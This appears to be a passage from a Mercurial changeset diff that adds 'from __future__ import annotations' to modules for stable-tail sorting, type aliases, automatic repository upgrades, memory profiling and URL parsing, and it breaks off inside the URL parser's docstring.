115 | 117 | # Notice that excl(cur) is disjoint from ancestors(pt), |
|
116 | 118 | # so there is no double-counting: |
|
117 | 119 | # rank(cur) = len([cur]) + len(excl(cur)) + rank(pt) |
|
118 | 120 | excl_part_size = cl.fast_rank(cursor_rev) - cl.fast_rank(pt) - 1 |
|
119 | 121 | yield from itertools.islice(exclusive_ancestors, excl_part_size) |
|
120 | 122 | cursor_rev = pt |
|
121 | 123 | |
|
122 | 124 | |
|
123 | 125 | def _find_all_leaps_naive(cl, head_rev): |
|
124 | 126 | """ |
|
125 | 127 | Yields the leaps in the stable-tail sort of the given revision. |
|
126 | 128 | |
|
127 | 129 | A leap is a pair of revisions (source, target) consecutive in the |
|
128 | 130 | stable-tail sort of a head, for which target != px(source). |
|
129 | 131 | |
|
130 | 132 | Leaps are yielded in the same order as encountered in the stable-tail sort, |
|
131 | 133 | from head to root. |
|
132 | 134 | """ |
|
133 | 135 | sts = _stable_tail_sort_naive(cl, head_rev) |
|
134 | 136 | prev = next(sts) |
|
135 | 137 | for current in sts: |
|
136 | 138 | if current != _parents(cl, prev)[0]: |
|
137 | 139 | yield (prev, current) |
|
138 | 140 | |
|
139 | 141 | prev = current |
|
140 | 142 | |
|
141 | 143 | |
|
142 | 144 | def _find_specific_leaps_naive(cl, head_rev): |
|
143 | 145 | """ |
|
144 | 146 | Returns the specific leaps in the stable-tail sort of the given revision. |
|
145 | 147 | |
|
146 | 148 | Specific leaps are leaps appear in the stable-tail sort of a given |
|
147 | 149 | revision, but not in the stable-tail sort of any of its ancestors. |
|
148 | 150 | |
|
149 | 151 | The final leaps (leading to the pt of the considered merge) are omitted. |
|
150 | 152 | |
|
151 | 153 | Only merge nodes can have associated specific leaps. |
|
152 | 154 | |
|
153 | 155 | This implementations uses the whole leap sets of the given revision and |
|
154 | 156 | of its parents. |
|
155 | 157 | """ |
|
156 | 158 | px, pt = _parents(cl, head_rev) |
|
157 | 159 | if px == nullrev or pt == nullrev: |
|
158 | 160 | return # linear nodes cannot have specific leaps |
|
159 | 161 | |
|
160 | 162 | parents_leaps = set(_find_all_leaps_naive(cl, px)) |
|
161 | 163 | |
|
162 | 164 | sts = _stable_tail_sort_naive(cl, head_rev) |
|
163 | 165 | prev = next(sts) |
|
164 | 166 | for current in sts: |
|
165 | 167 | if current == pt: |
|
166 | 168 | break |
|
167 | 169 | if current != _parents(cl, prev)[0]: |
|
168 | 170 | leap = (prev, current) |
|
169 | 171 | if leap not in parents_leaps: |
|
170 | 172 | yield leap |
|
171 | 173 | |
|
172 | 174 | prev = current |
@@ -1,48 +1,50 | |||
|
1 | 1 | # typelib.py - type hint aliases and support |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2022 Matt Harbison <matt_harbison@yahoo.com> |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | |
|
8 | from __future__ import annotations | |
|
9 | ||
|
8 | 10 | import typing |
|
9 | 11 | |
|
10 | 12 | from typing import ( |
|
11 | 13 | Callable, |
|
12 | 14 | ) |
|
13 | 15 | |
|
14 | 16 | # Note: this is slightly different from pycompat.TYPE_CHECKING, as using |
|
15 | 17 | # pycompat causes the BinaryIO_Proxy type to be resolved to ``object`` when |
|
16 | 18 | # used as the base class during a pytype run. |
|
17 | 19 | TYPE_CHECKING = typing.TYPE_CHECKING |
|
18 | 20 | |
|
19 | 21 | |
|
20 | 22 | # The BinaryIO class provides empty methods, which at runtime means that |
|
21 | 23 | # ``__getattr__`` on the proxy classes won't get called for the methods that |
|
22 | 24 | # should delegate to the internal object. So to avoid runtime changes because |
|
23 | 25 | # of the required typing inheritance, just use BinaryIO when typechecking, and |
|
24 | 26 | # ``object`` otherwise. |
|
25 | 27 | if TYPE_CHECKING: |
|
26 | 28 | from typing import ( |
|
27 | 29 | BinaryIO, |
|
28 | 30 | Union, |
|
29 | 31 | ) |
|
30 | 32 | |
|
31 | 33 | from . import ( |
|
32 | 34 | node, |
|
33 | 35 | posix, |
|
34 | 36 | windows, |
|
35 | 37 | ) |
|
36 | 38 | |
|
37 | 39 | BinaryIO_Proxy = BinaryIO |
|
38 | 40 | CacheStat = Union[posix.cachestat, windows.cachestat] |
|
39 | 41 | NodeConstants = node.sha1nodeconstants |
|
40 | 42 | else: |
|
41 | 43 | from typing import Any |
|
42 | 44 | |
|
43 | 45 | BinaryIO_Proxy = object |
|
44 | 46 | CacheStat = Any |
|
45 | 47 | NodeConstants = Any |
|
46 | 48 | |
|
47 | 49 | # scmutil.getuipathfn() related callback. |
|
48 | 50 | UiPathFn = Callable[[bytes], bytes] |
@@ -1,254 +1,257 | |||
|
1 | 1 | # upgrade.py - functions for automatic upgrade of Mercurial repository |
|
2 | 2 | # |
|
3 | 3 | # Copyright (c) 2022-present, Pierre-Yves David |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | ||
|
8 | from __future__ import annotations | |
|
9 | ||
|
7 | 10 | from ..i18n import _ |
|
8 | 11 | |
|
9 | 12 | from .. import ( |
|
10 | 13 | error, |
|
11 | 14 | requirements as requirementsmod, |
|
12 | 15 | scmutil, |
|
13 | 16 | ) |
|
14 | 17 | |
|
15 | 18 | from . import ( |
|
16 | 19 | actions, |
|
17 | 20 | engine, |
|
18 | 21 | ) |
|
19 | 22 | |
|
20 | 23 | |
|
21 | 24 | class AutoUpgradeOperation(actions.BaseOperation): |
|
22 | 25 | """A limited Upgrade Operation used to run simple auto upgrade task |
|
23 | 26 | |
|
24 | 27 | (Expand it as needed in the future) |
|
25 | 28 | """ |
|
26 | 29 | |
|
27 | 30 | def __init__(self, req): |
|
28 | 31 | super().__init__( |
|
29 | 32 | new_requirements=req, |
|
30 | 33 | backup_store=False, |
|
31 | 34 | ) |
|
32 | 35 | |
|
33 | 36 | |
|
34 | 37 | def get_share_safe_action(repo): |
|
35 | 38 | """return an automatic-upgrade action for `share-safe` if applicable |
|
36 | 39 | |
|
37 | 40 | If no action is needed, return None, otherwise return a callback to upgrade |
|
38 | 41 | or downgrade the repository according the configuration and repository |
|
39 | 42 | format. |
|
40 | 43 | """ |
|
41 | 44 | ui = repo.ui |
|
42 | 45 | requirements = repo.requirements |
|
43 | 46 | auto_upgrade_share_source = ui.configbool( |
|
44 | 47 | b'format', |
|
45 | 48 | b'use-share-safe.automatic-upgrade-of-mismatching-repositories', |
|
46 | 49 | ) |
|
47 | 50 | auto_upgrade_quiet = ui.configbool( |
|
48 | 51 | b'format', |
|
49 | 52 | b'use-share-safe.automatic-upgrade-of-mismatching-repositories:quiet', |
|
50 | 53 | ) |
|
51 | 54 | |
|
52 | 55 | action = None |
|
53 | 56 | |
|
54 | 57 | if ( |
|
55 | 58 | auto_upgrade_share_source |
|
56 | 59 | and requirementsmod.SHARED_REQUIREMENT not in requirements |
|
57 | 60 | ): |
|
58 | 61 | sf_config = ui.configbool(b'format', b'use-share-safe') |
|
59 | 62 | sf_local = requirementsmod.SHARESAFE_REQUIREMENT in requirements |
|
60 | 63 | if sf_config and not sf_local: |
|
61 | 64 | msg = _( |
|
62 | 65 | b"automatically upgrading repository to the `share-safe`" |
|
63 | 66 | b" feature\n" |
|
64 | 67 | ) |
|
65 | 68 | hint = b"(see `hg help config.format.use-share-safe` for details)\n" |
|
66 | 69 | |
|
67 | 70 | def action(): |
|
68 | 71 | if not (ui.quiet or auto_upgrade_quiet): |
|
69 | 72 | ui.write_err(msg) |
|
70 | 73 | ui.write_err(hint) |
|
71 | 74 | requirements.add(requirementsmod.SHARESAFE_REQUIREMENT) |
|
72 | 75 | scmutil.writereporequirements(repo, requirements) |
|
73 | 76 | |
|
74 | 77 | elif sf_local and not sf_config: |
|
75 | 78 | msg = _( |
|
76 | 79 | b"automatically downgrading repository from the `share-safe`" |
|
77 | 80 | b" feature\n" |
|
78 | 81 | ) |
|
79 | 82 | hint = b"(see `hg help config.format.use-share-safe` for details)\n" |
|
80 | 83 | |
|
81 | 84 | def action(): |
|
82 | 85 | if not (ui.quiet or auto_upgrade_quiet): |
|
83 | 86 | ui.write_err(msg) |
|
84 | 87 | ui.write_err(hint) |
|
85 | 88 | requirements.discard(requirementsmod.SHARESAFE_REQUIREMENT) |
|
86 | 89 | scmutil.writereporequirements(repo, requirements) |
|
87 | 90 | |
|
88 | 91 | return action |
|
89 | 92 | |
|
90 | 93 | |
|
91 | 94 | def get_tracked_hint_action(repo): |
|
92 | 95 | """return an automatic-upgrade action for `tracked-hint` if applicable |
|
93 | 96 | |
|
94 | 97 | If no action is needed, return None, otherwise return a callback to upgrade |
|
95 | 98 | or downgrade the repository according the configuration and repository |
|
96 | 99 | format. |
|
97 | 100 | """ |
|
98 | 101 | ui = repo.ui |
|
99 | 102 | requirements = set(repo.requirements) |
|
100 | 103 | auto_upgrade_tracked_hint = ui.configbool( |
|
101 | 104 | b'format', |
|
102 | 105 | b'use-dirstate-tracked-hint.automatic-upgrade-of-mismatching-repositories', |
|
103 | 106 | ) |
|
104 | 107 | auto_upgrade_quiet = ui.configbool( |
|
105 | 108 | b'format', |
|
106 | 109 | b'use-dirstate-tracked-hint.automatic-upgrade-of-mismatching-repositories:quiet', |
|
107 | 110 | ) |
|
108 | 111 | |
|
109 | 112 | action = None |
|
110 | 113 | |
|
111 | 114 | if auto_upgrade_tracked_hint: |
|
112 | 115 | th_config = ui.configbool(b'format', b'use-dirstate-tracked-hint') |
|
113 | 116 | th_local = requirementsmod.DIRSTATE_TRACKED_HINT_V1 in requirements |
|
114 | 117 | if th_config and not th_local: |
|
115 | 118 | msg = _( |
|
116 | 119 | b"automatically upgrading repository to the `tracked-hint`" |
|
117 | 120 | b" feature\n" |
|
118 | 121 | ) |
|
119 | 122 | hint = b"(see `hg help config.format.use-dirstate-tracked-hint` for details)\n" |
|
120 | 123 | |
|
121 | 124 | def action(): |
|
122 | 125 | if not (ui.quiet or auto_upgrade_quiet): |
|
123 | 126 | ui.write_err(msg) |
|
124 | 127 | ui.write_err(hint) |
|
125 | 128 | requirements.add(requirementsmod.DIRSTATE_TRACKED_HINT_V1) |
|
126 | 129 | op = AutoUpgradeOperation(requirements) |
|
127 | 130 | engine.upgrade_tracked_hint(ui, repo, op, add=True) |
|
128 | 131 | |
|
129 | 132 | elif th_local and not th_config: |
|
130 | 133 | msg = _( |
|
131 | 134 | b"automatically downgrading repository from the `tracked-hint`" |
|
132 | 135 | b" feature\n" |
|
133 | 136 | ) |
|
134 | 137 | hint = b"(see `hg help config.format.use-dirstate-tracked-hint` for details)\n" |
|
135 | 138 | |
|
136 | 139 | def action(): |
|
137 | 140 | if not (ui.quiet or auto_upgrade_quiet): |
|
138 | 141 | ui.write_err(msg) |
|
139 | 142 | ui.write_err(hint) |
|
140 | 143 | requirements.discard(requirementsmod.DIRSTATE_TRACKED_HINT_V1) |
|
141 | 144 | op = AutoUpgradeOperation(requirements) |
|
142 | 145 | engine.upgrade_tracked_hint(ui, repo, op, add=False) |
|
143 | 146 | |
|
144 | 147 | return action |
|
145 | 148 | |
|
146 | 149 | |
|
147 | 150 | def get_dirstate_v2_action(repo): |
|
148 | 151 | """return an automatic-upgrade action for `dirstate-v2` if applicable |
|
149 | 152 | |
|
150 | 153 | If no action is needed, return None, otherwise return a callback to upgrade |
|
151 | 154 | or downgrade the repository according the configuration and repository |
|
152 | 155 | format. |
|
153 | 156 | """ |
|
154 | 157 | ui = repo.ui |
|
155 | 158 | requirements = set(repo.requirements) |
|
156 | 159 | auto_upgrade_dv2 = ui.configbool( |
|
157 | 160 | b'format', |
|
158 | 161 | b'use-dirstate-v2.automatic-upgrade-of-mismatching-repositories', |
|
159 | 162 | ) |
|
160 | 163 | auto_upgrade_dv2_quiet = ui.configbool( |
|
161 | 164 | b'format', |
|
162 | 165 | b'use-dirstate-v2.automatic-upgrade-of-mismatching-repositories:quiet', |
|
163 | 166 | ) |
|
164 | 167 | |
|
165 | 168 | action = None |
|
166 | 169 | |
|
167 | 170 | if auto_upgrade_dv2: |
|
168 | 171 | d2_config = ui.configbool(b'format', b'use-dirstate-v2') |
|
169 | 172 | d2_local = requirementsmod.DIRSTATE_V2_REQUIREMENT in requirements |
|
170 | 173 | if d2_config and not d2_local: |
|
171 | 174 | msg = _( |
|
172 | 175 | b"automatically upgrading repository to the `dirstate-v2`" |
|
173 | 176 | b" feature\n" |
|
174 | 177 | ) |
|
175 | 178 | hint = ( |
|
176 | 179 | b"(see `hg help config.format.use-dirstate-v2` for details)\n" |
|
177 | 180 | ) |
|
178 | 181 | |
|
179 | 182 | def action(): |
|
180 | 183 | if not (ui.quiet or auto_upgrade_dv2_quiet): |
|
181 | 184 | ui.write_err(msg) |
|
182 | 185 | ui.write_err(hint) |
|
183 | 186 | requirements.add(requirementsmod.DIRSTATE_V2_REQUIREMENT) |
|
184 | 187 | fake_op = AutoUpgradeOperation(requirements) |
|
185 | 188 | engine.upgrade_dirstate(repo.ui, repo, fake_op, b'v1', b'v2') |
|
186 | 189 | |
|
187 | 190 | elif d2_local and not d2_config: |
|
188 | 191 | msg = _( |
|
189 | 192 | b"automatically downgrading repository from the `dirstate-v2`" |
|
190 | 193 | b" feature\n" |
|
191 | 194 | ) |
|
192 | 195 | hint = ( |
|
193 | 196 | b"(see `hg help config.format.use-dirstate-v2` for details)\n" |
|
194 | 197 | ) |
|
195 | 198 | |
|
196 | 199 | def action(): |
|
197 | 200 | if not (ui.quiet or auto_upgrade_dv2_quiet): |
|
198 | 201 | ui.write_err(msg) |
|
199 | 202 | ui.write_err(hint) |
|
200 | 203 | requirements.discard(requirementsmod.DIRSTATE_V2_REQUIREMENT) |
|
201 | 204 | fake_op = AutoUpgradeOperation(requirements) |
|
202 | 205 | engine.upgrade_dirstate(repo.ui, repo, fake_op, b'v2', b'v1') |
|
203 | 206 | |
|
204 | 207 | return action |
|
205 | 208 | |
|
206 | 209 | |
|
207 | 210 | AUTO_UPGRADE_ACTIONS = [ |
|
208 | 211 | get_dirstate_v2_action, |
|
209 | 212 | get_share_safe_action, |
|
210 | 213 | get_tracked_hint_action, |
|
211 | 214 | ] |
|
212 | 215 | |
|
213 | 216 | |
|
214 | 217 | def may_auto_upgrade(repo, maker_func): |
|
215 | 218 | """potentially perform auto-upgrade and return the final repository to use |
|
216 | 219 | |
|
217 | 220 | Auto-upgrade are "quick" repository upgrade that might automatically be run |
|
218 | 221 | by "any" repository access. See `hg help config.format` for automatic |
|
219 | 222 | upgrade documentation. |
|
220 | 223 | |
|
221 | 224 | note: each relevant upgrades are done one after the other for simplicity. |
|
222 | 225 | This avoid having repository is partially inconsistent state while |
|
223 | 226 | upgrading. |
|
224 | 227 | |
|
225 | 228 | repo: the current repository instance |
|
226 | 229 | maker_func: a factory function that can recreate a repository after an upgrade |
|
227 | 230 | """ |
|
228 | 231 | clear = False |
|
229 | 232 | |
|
230 | 233 | loop = 0 |
|
231 | 234 | |
|
232 | 235 | try: |
|
233 | 236 | while not clear: |
|
234 | 237 | loop += 1 |
|
235 | 238 | if loop > 100: |
|
236 | 239 | # XXX basic protection against infinite loop, make it better. |
|
237 | 240 | raise error.ProgrammingError("Too many auto upgrade loops") |
|
238 | 241 | clear = True |
|
239 | 242 | for get_action in AUTO_UPGRADE_ACTIONS: |
|
240 | 243 | action = get_action(repo) |
|
241 | 244 | if action is not None: |
|
242 | 245 | clear = False |
|
243 | 246 | with repo.wlock(wait=False), repo.lock(wait=False): |
|
244 | 247 | action = get_action(repo) |
|
245 | 248 | if action is not None: |
|
246 | 249 | action() |
|
247 | 250 | repo = maker_func() |
|
248 | 251 | except error.LockError: |
|
249 | 252 | # if we cannot get the lock, ignore the auto-upgrade attemps and |
|
250 | 253 | # proceed. We might want to make this behavior configurable in the |
|
251 | 254 | # future. |
|
252 | 255 | pass |
|
253 | 256 | |
|
254 | 257 | return repo |
@@ -1,44 +1,46 | |||
|
1 | 1 | # memorytop requires Python 3.4 |
|
2 | 2 | # |
|
3 | 3 | # Usage: set PYTHONTRACEMALLOC=n in the environment of the hg invocation, |
|
4 | 4 | # where n>= is the number of frames to show in the backtrace. Put calls to |
|
5 | 5 | # memorytop in strategic places to show the current memory use by allocation |
|
6 | 6 | # site. |
|
7 | 7 | |
|
8 | from __future__ import annotations | |
|
9 | ||
|
8 | 10 | import gc |
|
9 | 11 | import tracemalloc |
|
10 | 12 | |
|
11 | 13 | |
|
12 | 14 | def memorytop(limit=10): |
|
13 | 15 | gc.collect() |
|
14 | 16 | snapshot = tracemalloc.take_snapshot() |
|
15 | 17 | |
|
16 | 18 | snapshot = snapshot.filter_traces( |
|
17 | 19 | ( |
|
18 | 20 | tracemalloc.Filter(False, "<frozen importlib._bootstrap>"), |
|
19 | 21 | tracemalloc.Filter(False, "<frozen importlib._bootstrap_external>"), |
|
20 | 22 | tracemalloc.Filter(False, "<unknown>"), |
|
21 | 23 | ) |
|
22 | 24 | ) |
|
23 | 25 | stats = snapshot.statistics('traceback') |
|
24 | 26 | |
|
25 | 27 | total = sum(stat.size for stat in stats) |
|
26 | 28 | print("\nTotal allocated size: %.1f KiB\n" % (total / 1024)) |
|
27 | 29 | print("Lines with the biggest net allocations") |
|
28 | 30 | for index, stat in enumerate(stats[:limit], 1): |
|
29 | 31 | print( |
|
30 | 32 | "#%d: %d objects using %.1f KiB" |
|
31 | 33 | % (index, stat.count, stat.size / 1024) |
|
32 | 34 | ) |
|
33 | 35 | for line in stat.traceback.format(most_recent_first=True): |
|
34 | 36 | print(' ', line) |
|
35 | 37 | |
|
36 | 38 | other = stats[limit:] |
|
37 | 39 | if other: |
|
38 | 40 | size = sum(stat.size for stat in other) |
|
39 | 41 | count = sum(stat.count for stat in other) |
|
40 | 42 | print( |
|
41 | 43 | "%s other: %d objects using %.1f KiB" |
|
42 | 44 | % (len(other), count, size / 1024) |
|
43 | 45 | ) |
|
44 | 46 | print() |
@@ -1,971 +1,974 | |||
|
1 | 1 | # utils.urlutil - code related to [paths] management |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2005-2023 Olivia Mackall <olivia@selenic.com> and others |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | ||
|
8 | from __future__ import annotations | |
|
9 | ||
|
7 | 10 | import os |
|
8 | 11 | import re as remod |
|
9 | 12 | import socket |
|
10 | 13 | |
|
11 | 14 | from typing import ( |
|
12 | 15 | Callable, |
|
13 | 16 | Dict, |
|
14 | 17 | Tuple, |
|
15 | 18 | Union, |
|
16 | 19 | ) |
|
17 | 20 | |
|
18 | 21 | from ..i18n import _ |
|
19 | 22 | from .. import ( |
|
20 | 23 | encoding, |
|
21 | 24 | error, |
|
22 | 25 | pycompat, |
|
23 | 26 | urllibcompat, |
|
24 | 27 | ) |
|
25 | 28 | |
|
26 | 29 | from . import ( |
|
27 | 30 | stringutil, |
|
28 | 31 | ) |
|
29 | 32 | |
|
30 | 33 | from ..revlogutils import ( |
|
31 | 34 | constants as revlog_constants, |
|
32 | 35 | ) |
|
33 | 36 | |
|
34 | 37 | # keeps pyflakes happy |
|
35 | 38 | assert [Callable, Dict, Tuple, Union] |
|
36 | 39 | |
|
37 | 40 | urlreq = urllibcompat.urlreq |
|
38 | 41 | |
|
39 | 42 | |
|
40 | 43 | def getport(port: Union[bytes, int]) -> int: |
|
41 | 44 | """Return the port for a given network service. |
|
42 | 45 | |
|
43 | 46 | If port is an integer, it's returned as is. If it's a string, it's |
|
44 | 47 | looked up using socket.getservbyname(). If there's no matching |
|
45 | 48 | service, error.Abort is raised. |
|
46 | 49 | """ |
|
47 | 50 | try: |
|
48 | 51 | return int(port) |
|
49 | 52 | except ValueError: |
|
50 | 53 | pass |
|
51 | 54 | |
|
52 | 55 | try: |
|
53 | 56 | return socket.getservbyname(pycompat.sysstr(port)) |
|
54 | 57 | except socket.error: |
|
55 | 58 | raise error.Abort( |
|
56 | 59 | _(b"no port number associated with service '%s'") % port |
|
57 | 60 | ) |
|
58 | 61 | |
|
59 | 62 | |
|
60 | 63 | class url: |
|
61 | 64 | r"""Reliable URL parser. |
|
62 | 65 | |
|
63 | 66 | This parses URLs and provides attributes for the following |
|
64 | 67 | components: |
|
65 | 68 | |
|
66 | 69 | <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> |
|
67 | 70 | |
|
68 | 71 | Missing components are set to None. The only exception is |
|
69 | 72 | fragment, which is set to '' if present but empty. |
|
70 | 73 | |
|
71 | 74 | If parsefragment is False, fragment is included in query. If |
|
72 | 75 | parsequery is False, query is included in path. If both are |
|
73 | 76 | False, both fragment and query are included in path. |
|
74 | 77 | |
|
75 | 78 | See http://www.ietf.org/rfc/rfc2396.txt for more information. |
|
76 | 79 | |
|
77 | 80 | Note that for backward compatibility reasons, bundle URLs do not |
|
78 | 81 | take host names. That means 'bundle://../' has a path of '../'. |
|
79 | 82 | |
|
80 | 83 | Examples: |
|
81 | 84 | |
|
82 | 85 | >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') |
|
83 | 86 | <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> |
|
84 | 87 | >>> url(b'ssh://[::1]:2200//home/joe/repo') |
|
85 | 88 | <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> |
|
86 | 89 | >>> url(b'file:///home/joe/repo') |
|
87 | 90 | <url scheme: 'file', path: '/home/joe/repo'> |
|
88 | 91 | >>> url(b'file:///c:/temp/foo/') |
|
89 | 92 | <url scheme: 'file', path: 'c:/temp/foo/'> |
|
90 | 93 | >>> url(b'bundle:foo') |
|
91 | 94 | <url scheme: 'bundle', path: 'foo'> |
|
92 | 95 | >>> url(b'bundle://../foo') |
|
93 | 96 | <url scheme: 'bundle', path: '../foo'> |
|
94 | 97 | >>> url(br'c:\foo\bar') |
|
95 | 98 | <url path: 'c:\\foo\\bar'> |
|
96 | 99 | >>> url(br'\\blah\blah\blah') |
|
97 | 100 | <url path: '\\\\blah\\blah\\blah'> |
|
98 | 101 | >>> url(br'\\blah\blah\blah#baz') |
|
99 | 102 | <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> |
|
100 | 103 | >>> url(br'file:///C:\users\me') |
|
101 | 104 | <url scheme: 'file', path: 'C:\\users\\me'> |
|
102 | 105 | |
|
103 | 106 | Authentication credentials: |
|
104 | 107 | |
|
105 | 108 | >>> url(b'ssh://joe:xyz@x/repo') |
|
106 | 109 | <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> |
|
107 | 110 | >>> url(b'ssh://joe@x/repo') |
|
108 | 111 | <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> |
|
109 | 112 | |
|
110 | 113 | Query strings and fragments: |
|
111 | 114 | |
|
112 | 115 | >>> url(b'http://host/a?b#c') |
|
113 | 116 | <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> |
|
114 | 117 | >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) |
|
115 | 118 | <url scheme: 'http', host: 'host', path: 'a?b#c'> |
|
116 | 119 | |
|
117 | 120 | Empty path: |
|
118 | 121 | |
|
119 | 122 | >>> url(b'') |
|
120 | 123 | <url path: ''> |
|
121 | 124 | >>> url(b'#a') |
|
122 | 125 | <url path: '', fragment: 'a'> |
|
123 | 126 | >>> url(b'http://host/') |
|
124 | 127 | <url scheme: 'http', host: 'host', path: ''> |
|
125 | 128 | >>> url(b'http://host/#a') |
|
126 | 129 | <url scheme: 'http', host: 'host', path: '', fragment: 'a'> |
|
127 | 130 | |
|
128 | 131 | Only scheme: |
|
129 | 132 | |
|
130 | 133 | >>> url(b'http:') |
|
131 | 134 | <url scheme: 'http'> |
|
132 | 135 | """ |
|
133 | 136 | |
|
134 | 137 | _safechars = b"!~*'()+" |
|
135 | 138 | _safepchars = b"/!~*'()+:\\" |
|
136 | 139 | _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match |
|
137 | 140 | |
|
138 | 141 | def __init__( |
|
139 | 142 | self, |
|
140 | 143 | path: bytes, |
|
141 | 144 | parsequery: bool = True, |
|
142 | 145 | parsefragment: bool = True, |
|
143 | 146 | ) -> None: |
|
144 | 147 | # We slowly chomp away at path until we have only the path left |
|
145 | 148 | self.scheme = self.user = self.passwd = self.host = None |
|
146 | 149 | self.port = self.path = self.query = self.fragment = None |
|
147 | 150 | self._localpath = True |
|
148 | 151 | self._hostport = b'' |
|
149 | 152 | self._origpath = path |
|
150 | 153 | |
|
151 | 154 | if parsefragment and b'#' in path: |
|
152 | 155 | path, self.fragment = path.split(b'#', 1) |
|
153 | 156 | |
|
154 | 157 | # special case for Windows drive letters and UNC paths |
|
155 | 158 | if hasdriveletter(path) or path.startswith(b'\\\\'): |
|
156 | 159 | self.path = path |
|
157 | 160 | return |
|
158 | 161 | |
|
159 | 162 | # For compatibility reasons, we can't handle bundle paths as |
|
160 | 163 | # normal URLS |
|
161 | 164 | if path.startswith(b'bundle:'): |
|
162 | 165 | self.scheme = b'bundle' |
|
163 | 166 | path = path[7:] |
|
164 | 167 | if path.startswith(b'//'): |
|
165 | 168 | path = path[2:] |
|
166 | 169 | self.path = path |
|
167 | 170 | return |
|
168 | 171 | |
|
169 | 172 | if self._matchscheme(path): |
|
170 | 173 | parts = path.split(b':', 1) |
|
171 | 174 | if parts[0]: |
|
172 | 175 | self.scheme, path = parts |
|
173 | 176 | self._localpath = False |
|
174 | 177 | |
|
175 | 178 | if not path: |
|
176 | 179 | path = None |
|
177 | 180 | if self._localpath: |
|
178 | 181 | self.path = b'' |
|
179 | 182 | return |
|
180 | 183 | else: |
|
181 | 184 | if self._localpath: |
|
182 | 185 | self.path = path |
|
183 | 186 | return |
|
184 | 187 | |
|
185 | 188 | if parsequery and b'?' in path: |
|
186 | 189 | path, self.query = path.split(b'?', 1) |
|
187 | 190 | if not path: |
|
188 | 191 | path = None |
|
189 | 192 | if not self.query: |
|
190 | 193 | self.query = None |
|
191 | 194 | |
|
192 | 195 | # // is required to specify a host/authority |
|
193 | 196 | if path and path.startswith(b'//'): |
|
194 | 197 | parts = path[2:].split(b'/', 1) |
|
195 | 198 | if len(parts) > 1: |
|
196 | 199 | self.host, path = parts |
|
197 | 200 | else: |
|
198 | 201 | self.host = parts[0] |
|
199 | 202 | path = None |
|
200 | 203 | if not self.host: |
|
201 | 204 | self.host = None |
|
202 | 205 | # path of file:///d is /d |
|
203 | 206 | # path of file:///d:/ is d:/, not /d:/ |
|
204 | 207 | if path and not hasdriveletter(path): |
|
205 | 208 | path = b'/' + path |
|
206 | 209 | |
|
207 | 210 | if self.host and b'@' in self.host: |
|
208 | 211 | self.user, self.host = self.host.rsplit(b'@', 1) |
|
209 | 212 | if b':' in self.user: |
|
210 | 213 | self.user, self.passwd = self.user.split(b':', 1) |
|
211 | 214 | if not self.host: |
|
212 | 215 | self.host = None |
|
213 | 216 | |
|
214 | 217 | # Don't split on colons in IPv6 addresses without ports |
|
215 | 218 | if ( |
|
216 | 219 | self.host |
|
217 | 220 | and b':' in self.host |
|
218 | 221 | and not ( |
|
219 | 222 | self.host.startswith(b'[') and self.host.endswith(b']') |
|
220 | 223 | ) |
|
221 | 224 | ): |
|
222 | 225 | self._hostport = self.host |
|
223 | 226 | self.host, self.port = self.host.rsplit(b':', 1) |
|
224 | 227 | if not self.host: |
|
225 | 228 | self.host = None |
|
226 | 229 | |
|
227 | 230 | if ( |
|
228 | 231 | self.host |
|
229 | 232 | and self.scheme == b'file' |
|
230 | 233 | and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') |
|
231 | 234 | ): |
|
232 | 235 | raise error.Abort( |
|
233 | 236 | _(b'file:// URLs can only refer to localhost') |
|
234 | 237 | ) |
|
235 | 238 | |
|
236 | 239 | self.path = path |
|
237 | 240 | |
|
238 | 241 | # leave the query string escaped |
|
239 | 242 | for a in ('user', 'passwd', 'host', 'port', 'path', 'fragment'): |
|
240 | 243 | v = getattr(self, a) |
|
241 | 244 | if v is not None: |
|
242 | 245 | setattr(self, a, urlreq.unquote(v)) |
|
243 | 246 | |
|
244 | 247 | def copy(self): |
|
245 | 248 | u = url(b'temporary useless value') |
|
246 | 249 | u.path = self.path |
|
247 | 250 | u.scheme = self.scheme |
|
248 | 251 | u.user = self.user |
|
249 | 252 | u.passwd = self.passwd |
|
250 | 253 | u.host = self.host |
|
251 | 254 | u.port = self.port |
|
252 | 255 | u.query = self.query |
|
253 | 256 | u.fragment = self.fragment |
|
254 | 257 | u._localpath = self._localpath |
|
255 | 258 | u._hostport = self._hostport |
|
256 | 259 | u._origpath = self._origpath |
|
257 | 260 | return u |
|
258 | 261 | |
|
259 | 262 | @encoding.strmethod |
|
260 | 263 | def __repr__(self): |
|
261 | 264 | attrs = [] |
|
262 | 265 | for a in ( |
|
263 | 266 | 'scheme', |
|
264 | 267 | 'user', |
|
265 | 268 | 'passwd', |
|
266 | 269 | 'host', |
|
267 | 270 | 'port', |
|
268 | 271 | 'path', |
|
269 | 272 | 'query', |
|
270 | 273 | 'fragment', |
|
271 | 274 | ): |
|
272 | 275 | v = getattr(self, a) |
|
273 | 276 | if v is not None: |
|
274 | 277 | line = b'%s: %r' |
|
275 | 278 | line %= (pycompat.bytestr(a), pycompat.bytestr(v)) |
|
276 | 279 | attrs.append(line) |
|
277 | 280 | return b'<url %s>' % b', '.join(attrs) |
|
278 | 281 | |
|
279 | 282 | def __bytes__(self): |
|
280 | 283 | r"""Join the URL's components back into a URL string. |
|
281 | 284 | |
|
282 | 285 | Examples: |
|
283 | 286 | |
|
